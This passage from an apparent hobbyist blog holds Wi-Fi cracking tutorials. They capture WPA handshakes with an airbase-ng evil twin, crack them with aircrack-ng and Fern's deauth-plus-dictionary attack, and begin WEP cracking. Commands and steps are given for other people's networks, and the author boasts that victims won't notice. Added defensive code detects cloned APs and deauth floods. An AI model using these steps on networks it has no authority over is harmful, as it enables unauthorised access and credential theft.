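    eapol(struct.pack("!BBH", EAP_SUCCESS, 5, 4)),                       # Success
    b"\x02\x01\x00\x00",                                                 # EAPOL-Start
]

if __name__ == "__main__":
    for name, weak in offered_methods(SAMPLE_FRAMES):
        verdict = "WEAK: offline dictionary attack" if weak else "tunneled/cert-based"
        print(f"{name:14s} {verdict}")
    _, ident, _, data = parse_eapol(SAMPLE_FRAMES[1])
    chal, name = md5_challenge_fields(data)
    resp = eap_md5_response(ident, b"constructed-pw", chal)
    print("server verifies:", verify_md5_response(ident, b"constructed-pw", chal, resp))
```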
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Reference: Google :D</div>
<br />
<br />
<br /><div><b>ANOTHER EASY WAY TO GET THE WPA HANDSHAKE</b> (posted 2013-03-03)</div><div style="text-align: center;">
<span style="color: purple;">Hey guys,</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;">here's another tutorial of mine on how to get the WPA HANDSHAKE (for cracking WPA encryption) in a VERY EASY WAY!!</span></div>
<div style="text-align: center;">
<span style="color: purple;">PRE-REQUISITES</span></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"># You Should have a wireless card which supports "PACKET INJECTION".</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"># Your wireless card should be on the monitor mode (Recommended) </span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"># Naaaaaa that's all :P</span></div>
<div style="text-align: center;">
<span style="color: purple;">OK then, let's start...</span></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple;"># Run airodump-ng to start monitoring the air.</span></div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>airodump-ng mon0</b></span></div>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-of4vkQAXFdE/UTM7BGINn2I/AAAAAAAAARg/PWDWVPi6L24/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-of4vkQAXFdE/UTM7BGINn2I/AAAAAAAAARg/PWDWVPi6L24/s640/3.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<span style="color: purple;">If you have wireless networks in the vicinity, you'll see a list of networks.</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"># Choose a network for which you want to get the WPA HANDSHAKE.</span></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"># After selecting the network, you need the following info from that network:</span></div>
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;">BSSID (MAC Address of the AP)</span></div>
<div style="text-align: center;">
<span style="color: purple;">ESSID (Name of the AP)</span></div>
<div style="text-align: center;">
<span style="color: purple;">CHANNEL</span></div>
<div style="text-align: center;">
<span style="color: purple;">CIPHER TYPE</span></div>
<br />
<div>
<div style="text-align: center;">
<span style="color: purple;"># Now open a new terminal and type the following command:</span></div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0</b></span></div>
</blockquote>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-IHAGMTRsxlU/UTM67mQoWqI/AAAAAAAAARU/S57msZ7aENs/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://2.bp.blogspot.com/-IHAGMTRsxlU/UTM67mQoWqI/AAAAAAAAARU/S57msZ7aENs/s640/4.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-a bssid : set Access Point MAC address</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-v : verbose (print more messages)</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-c channel : sets the channel the AP is running on</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-z type : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-Z type : same as -z, but for WPA2</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-V type : fake EAPOL 1=MD5 2=SHA1 3=auto</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-F prefix : write all sent and received frames into pcap file</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-P : respond to all probes, even when specifying ESSIDs</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-I interval : sets the beacon interval value in ms</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-C seconds : enables beaconing of probed ESSID values (requires -P)</span></div>
</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"># airbase-ng is a tool for creating a fake AP. Here, create the fake AP with the same BSSID, ESSID, channel and cipher type as the network you want the WPA handshake from.</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">in the above, I used the "-z 4" switch, which tells airbase-ng that the network has a CCMP cipher type, and with "-V 3" I am generating fake EAPOL packets.</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;"># Now comes the signal game: if you have a higher signal strength than the other network, then without even deauthenticating the clients, you'll get the WPA handshake.</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
"Here is the best part, the client will not even know that his/her network is under attack :D :D</div>
<div style="text-align: center;">
because we are not deauthenticating him/her from the AP :D :D"</div>
</span></div>
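<div style="text-align: justify;">
<span style="color: purple;">From the defender's side: a fake AP that copies the BSSID, ESSID, channel and cipher of the real one passes any inventory check, but its beacons still betray a second transmitter. The check below is an added example written for this page, not code from the post or from the aircrack-ng project. It assumes raw 802.11 beacon frames with the radiotap header already stripped, and every frame in its sample capture is constructed in the file. It flags a BSSID whose TSF timestamp stops tracking the capture clock (the clone runs its own TSF), whose beacon interval changes (the command above uses -I 10, i.e. 10 TU, while a normal AP beacons every 100 TU), whose channel changes, or that advertises an ESSID it is not inventoried for.</span></div>

```python
"""Beacon-consistency check for a cloned (evil-twin) access point.

Added example for this page, not code from the original post or from the
aircrack-ng project. It parses raw 802.11 beacon frames (radiotap header
already stripped) and flags a BSSID whose beacons cannot all come from one
transmitter. Every frame in the sample capture is constructed below.
"""

BEACON_FC0 = 0x80          # frame-control byte 0: type=management, subtype=8
TU_US = 1024               # one 802.11 time unit (TU) in microseconds
TSF_TOLERANCE_US = 50_000  # allowed disagreement between TSF and capture clock


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_beacon(frame):
    """Return the fields the checks need, or None if this is not a beacon."""
    if len(frame) < 36 or frame[0] != BEACON_FC0:
        return None
    bssid = mac_str(frame[16:22])                      # addr3 of a management frame
    tsf = int.from_bytes(frame[24:32], "little")       # 64-bit timestamp, microseconds
    interval = int.from_bytes(frame[32:34], "little")  # beacon interval in TU
    essid, channel = None, None
    pos = 36                                           # first information element
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        data = frame[pos + 2:pos + 2 + length]
        if tag == 0:                                   # SSID element
            essid = data.decode("utf-8", "replace")
        elif tag == 3 and length == 1:                 # DS parameter set: channel
            channel = data[0]
        pos += 2 + length
    return {"bssid": bssid, "tsf": tsf, "interval": interval,
            "essid": essid, "channel": channel}


def check_beacons(capture, inventory):
    """capture: list of (capture_time_us, frame) in time order.
    inventory: {essid: set of BSSIDs allowed to advertise it}.
    Returns {bssid: set of reason codes} for every BSSID with a finding."""
    findings, last = {}, {}

    def flag(bssid, reason):
        findings.setdefault(bssid, set()).add(reason)

    for now, frame in capture:
        b = parse_beacon(frame)
        if b is None:
            continue
        if b["bssid"] not in inventory.get(b["essid"], set()):
            flag(b["bssid"], "unknown_bssid_for_essid")
        if b["bssid"] in last:
            p, then = last[b["bssid"]]
            if b["interval"] != p["interval"]:
                flag(b["bssid"], "beacon_interval_changed")
            if b["channel"] != p["channel"]:
                flag(b["bssid"], "channel_changed")
            # One transmitter's TSF advances at the same rate as our capture
            # clock; a second radio with its own TSF shows up as a large jump.
            drift = (b["tsf"] - p["tsf"]) - (now - then)
            if abs(drift) > TSF_TOLERANCE_US:
                flag(b["bssid"], "tsf_jump")
        last[b["bssid"]] = (b, now)
    return findings


def build_beacon(bssid, tsf, interval_tu, essid, channel):
    """Constructed beacon frame, used only to build the sample capture."""
    header = (bytes([BEACON_FC0, 0]) + b"\x00\x00"     # frame control, duration
              + b"\xff" * 6 + bssid + bssid             # DA=broadcast, SA, BSSID
              + b"\x00\x00")                            # sequence control
    body = (tsf.to_bytes(8, "little") + interval_tu.to_bytes(2, "little")
            + (0x0411).to_bytes(2, "little"))           # capability: ESS + privacy
    body += bytes([0, len(essid)]) + essid.encode()     # SSID element
    body += bytes([3, 1, channel])                      # DS parameter set
    return header + body


REAL_AP = bytes.fromhex("aabbcc000001")     # constructed addresses
OTHER_AP = bytes.fromhex("aabbcc000002")
ROGUE_AP = bytes.fromhex("deadbeef0003")
INVENTORY = {"CorpNet": {mac_str(REAL_AP)}, "Lab": {mac_str(OTHER_AP)}}


def sample_capture():
    """Constructed capture: two genuine APs beaconing every 100 TU, a clone of
    CorpNet with the same BSSID/ESSID/channel but its own TSF clock and a 10 TU
    interval, and a rogue AP advertising CorpNet from a foreign BSSID."""
    frames = [(10_000, build_beacon(ROGUE_AP, 42, 100, "CorpNet", 1))]
    for i in range(3):
        t = i * 100 * TU_US
        frames.append((t, build_beacon(REAL_AP, 5_000_000_000 + t, 100, "CorpNet", 6)))
        frames.append((t, build_beacon(OTHER_AP, 7_000_000_000 + t, 100, "Lab", 11)))
        frames.append((t + 50_000, build_beacon(REAL_AP, 1_000_000 + t, 10, "CorpNet", 6)))
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    for bssid, reasons in sorted(check_beacons(sample_capture(), INVENTORY).items()):
        print(bssid, sorted(reasons))
```

<div style="text-align: justify;">
<span style="color: purple;">Run it as a script to print the findings for the constructed capture; in practice, feed it beacons from a monitor-mode interface together with the allow-list of your own BSSIDs. The TSF and beacon-interval checks are the ones that survive a clone which matches everything airodump-ng displays, since the clone cannot copy the real AP's running clock.</span></div>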
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-cRjTMeSmw6A/UTM6_mUrL6I/AAAAAAAAARc/9-tmLWHji5A/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-cRjTMeSmw6A/UTM6_mUrL6I/AAAAAAAAARc/9-tmLWHji5A/s640/5.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;">here you see "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid> "</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;">this means that the client is connected to your fake AP and we have just received the WPA handshake (you still need at least 3-4 messages like that to properly get the WPA handshake)</span></div>
<span style="color: purple;">
</span></div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;"># now just close it... you're done !! :P</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
#for checking if we got the WPA handshake or not, run this command:</div>
</span></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<br /></div>
</div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>aircrack-ng <location of the pcap file> -w <wordlist></b></span></div>
</blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-vb8t5lrmNZM/UTM7GSo6ClI/AAAAAAAAARs/nSt2z0voizw/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-vb8t5lrmNZM/UTM7GSo6ClI/AAAAAAAAARs/nSt2z0voizw/s640/6.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;">as you can see here, i have got a handshake </span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-_zqgui4ryFI/UTM7JXsjYEI/AAAAAAAAAR0/nFVaicfGFnw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://3.bp.blogspot.com/-_zqgui4ryFI/UTM7JXsjYEI/AAAAAAAAAR0/nFVaicfGFnw/s640/7.png" width="640" /></a></div>
<br />
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;">That's all ...</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
i hope its helpful to you all :-)</div>
</span><br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;">Thanks for reading !!</span></div>
<div style="text-align: center;">
<span style="color: purple;">Posted by Abyss Zircanavo (http://www.blogger.com/profile/17618036098642560367), 0 comments.</span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><b>[TUT] WPA2 CCMP Cracking using Fern Wifi Cracker [TUT]</b></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">Published 2012-09-12, last updated 2013-09-23.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">hey guys !!</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">day before yesterday I made a tutorial on WEP cracking using a built-in tool called "fern wifi cracker"...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">today i'll show you how to crack WPA2 CCMP using the same tool...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">so now let us begin..</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">open fern wifi cracker...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NHUQ-dvuFC4/UE-bZA_6fQI/AAAAAAAAAOE/jc_XDJoCu_g/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-NHUQ-dvuFC4/UE-bZA_6fQI/AAAAAAAAAOE/jc_XDJoCu_g/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span>
<span style="color: purple; font-size: large;">select the wireless interface from the list.</span></div>
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Zic-tsSJSxc/UE-bbgzhSRI/AAAAAAAAAOM/Sj_ra6ZjzVY/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-Zic-tsSJSxc/UE-bbgzhSRI/AAAAAAAAAOM/Sj_ra6ZjzVY/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">when you select your card, a window will open... ignore it, just click OK</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eh7Kee1qJ7w/UE-b6QBP_8I/AAAAAAAAAOU/0EfuUXkzFP4/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-eh7Kee1qJ7w/UE-b6QBP_8I/AAAAAAAAAOU/0EfuUXkzFP4/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;">double click anywhere on the tool to get the settings... and then enable the xterm from there... (the window that appeared above was just informing you about the "settings") </span><br />
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ym0382iQgfI/UE-b8Q3DaOI/AAAAAAAAAOc/A9e4hJIqigE/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-ym0382iQgfI/UE-b8Q3DaOI/AAAAAAAAAOc/A9e4hJIqigE/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now click on the button with the wifi logo on it, the scanning will start when you click it..</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
</div>
<div style="text-align: center;">
<br />
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now you will be able to see the xterms running WEP & WPA scanning (it's using airodump)</span></div>
<span style="color: purple; font-size: large;"></span><br />
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<span style="color: purple; font-size: large;">
*in the pic I actually closed the xterm for WEP.</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HUkNRrVwHgY/UE-cW2QlcwI/AAAAAAAAAOk/-1vNUm_JsmU/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-HUkNRrVwHgY/UE-cW2QlcwI/AAAAAAAAAOk/-1vNUm_JsmU/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now click on the button which says "WPA". when you do that, a window will open... </span><span style="color: purple; font-size: large;">just click the AP from the list and then select a wordlist for the WPA2 CCMP cracking (dictionary attack)</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">select a client which you want to disconnect (deauth) from the AP through the list.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">and now run "Attack"</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-59TXK8zEnDU/UE-ca786R-I/AAAAAAAAAOs/9XVZBtErwYY/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-59TXK8zEnDU/UE-ca786R-I/AAAAAAAAAOs/9XVZBtErwYY/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ALk3jj3P1Ug/UE-cc8zUVCI/AAAAAAAAAO0/Zc9Iw73RIIo/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-ALk3jj3P1Ug/UE-cc8zUVCI/AAAAAAAAAO0/Zc9Iw73RIIo/s640/3.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">after a few seconds (or minutes) you'll see one xterm appear which is sniffing the AP (actually waiting for the WPA handshake), and another xterm appearing every 3-4 seconds (this xterm is trying to deauthenticate the client by sending "Deauth" packets)</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-UiIEj4msRFY/UE-ce7C8KII/AAAAAAAAAO8/ioqkI4grLmg/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-UiIEj4msRFY/UE-ce7C8KII/AAAAAAAAAO8/ioqkI4grLmg/s640/4.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-bPNCBAOSbf0/UE-chBfKwnI/AAAAAAAAAPE/gv65XzT-tc8/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-bPNCBAOSbf0/UE-chBfKwnI/AAAAAAAAAPE/gv65XzT-tc8/s640/5.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;">now when you get the WPA-handshake, the tool will start the dictionary attack automatically and if the password is there in the wordlist then it will be displayed on the window..</span>
<br />
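<div style="text-align: justify;">
<span style="color: purple; font-size: large;">What the deauth xterm described above looks like to a defender: bursts of deauthentication frames carrying the AP's BSSID, far more than any client roaming would produce. The detector below is an added example written for this page, not code from the post or from the Fern or aircrack-ng projects. It assumes raw 802.11 frames with the radiotap header already stripped and a capture clock in microseconds; every frame in its sample capture is constructed in the file. It counts deauth and disassoc frames per BSSID inside a sliding window and reports the peak count for any BSSID that crosses the threshold, while a lone deauth stays below it.</span></div>

```python
"""Deauthentication-flood detector over raw 802.11 management frames.

Added example for this page, not code from the original post or from the
Fern / aircrack-ng projects. The deauth step shows up on the air as bursts of
deauthentication frames carrying the AP's BSSID; a wireless IDS catches that
by counting such frames per BSSID in a sliding window. Frames are raw 802.11
(radiotap stripped) and all of them are constructed below.
"""
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0        # frame-control byte 0: type=management, subtype=12
DISASSOC_FC0 = 0xA0      # type=management, subtype=10
WINDOW_US = 10_000_000   # sliding window of 10 seconds, in microseconds
THRESHOLD = 20           # more than this many frames per window is a flood


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def is_deauth_like(frame):
    """Deauth and disassoc frames: 24-byte header plus a 2-byte reason code."""
    return len(frame) >= 26 and frame[0] in (DEAUTH_FC0, DISASSOC_FC0)


def deauth_floods(capture, window_us=WINDOW_US, threshold=THRESHOLD):
    """capture: iterable of (capture_time_us, frame) in time order.
    Returns {bssid: peak frames per window} for every BSSID that exceeded the
    threshold; a single deauth (normal when a client roams) never does."""
    recent = defaultdict(deque)      # bssid -> timestamps still inside the window
    alerts = {}
    for now, frame in capture:
        if not is_deauth_like(frame):
            continue
        bssid = mac_str(frame[16:22])          # addr3 = BSSID
        window = recent[bssid]
        window.append(now)
        while now - window[0] > window_us:     # expire timestamps that fell out
            window.popleft()
        if len(window) > threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(window))
    return alerts


def build_deauth(bssid, client, reason=7):
    """Constructed deauth frame carrying the BSSID as sender; reason 7 is
    'class 3 frame received from non-associated station'."""
    return (bytes([DEAUTH_FC0, 0]) + b"\x00\x00"   # frame control, duration
            + client + bssid + bssid                 # DA=client, SA=BSSID, BSSID
            + b"\x00\x00"                            # sequence control
            + reason.to_bytes(2, "little"))


AP = bytes.fromhex("aabbcc000001")        # constructed addresses
OTHER_AP = bytes.fromhex("aabbcc000002")
CLIENT = bytes.fromhex("001122334455")


def sample_capture():
    """Constructed capture: one legitimate deauth from OTHER_AP, then bursts of
    8 deauths every 3 s for 30 s carrying AP's BSSID, plus a data frame per
    burst that the detector must ignore."""
    frames = [(1_000_000, build_deauth(OTHER_AP, CLIENT, reason=3))]
    for burst in range(10):
        base = burst * 3_000_000
        frames.append((base + 1000, bytes([0x08, 0x01]) + b"\x00" * 30))  # data frame
        for k in range(8):
            frames.append((base + k * 2000, build_deauth(AP, CLIENT)))
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    print(deauth_floods(sample_capture()))   # {'aa:bb:cc:00:00:01': 32}
```

<div style="text-align: justify;">
<span style="color: purple; font-size: large;">The window and threshold are deliberately loose (20 frames in 10 seconds) so that a single disconnect does not page anyone; tune them against a baseline of your own network, and key the alert on the client address as well if you want to see which station is being targeted.</span></div>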
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-wmLNgKqRM6w/UE-cjczy8YI/AAAAAAAAAPM/QXpgIcsyN08/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-wmLNgKqRM6w/UE-cjczy8YI/AAAAAAAAAPM/QXpgIcsyN08/s640/6.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">ok this is it for WPA2 CCMP cracking... i hope you liked it... </span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">Posted by Abyss Zircanavo (http://www.blogger.com/profile/17618036098642560367), 1 comment.</span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><b>[TUT] WEP cracking using fern-wifi-cracker in bt5 r3 [TUT]</b></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">Published 2012-09-10, last updated 2013-09-23.</span></div>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">hey guys...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">today I tried a new tool on <b>Backtrack 5 R3</b> ... it's called "<b>fern-wifi-cracker</b>" </span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">this tool is really good...so i thought i should make a tut on this...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">so lets begin ...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">go to backtrack --> exploitation tools --> wireless exploitation tools --> WLAN exploitation --> fern-wifi-cracker</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lKWjPB2yYL0/UE4Az6Dm4ZI/AAAAAAAAAMw/Ut9uXVKtSwc/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="476" src="http://4.bp.blogspot.com/-lKWjPB2yYL0/UE4Az6Dm4ZI/AAAAAAAAAMw/Ut9uXVKtSwc/s640/1.jpg" width="640" /></span></a></div>
<br />
<br />
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">now select the wireless interface you have ( it can be wlan0, wlan1 etc..)</span></div>
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rtPj3VCDCeY/UE4A09g6miI/AAAAAAAAAM4/p5G8VQqiZeM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://2.bp.blogspot.com/-rtPj3VCDCeY/UE4A09g6miI/AAAAAAAAAM4/p5G8VQqiZeM/s640/2.jpg" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: red; font-size: large;">now there's a button with the wifi logo on it; click it and it will start the network scanning (of course it's using airodump here).</span><br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;">*note: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm.</span><br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
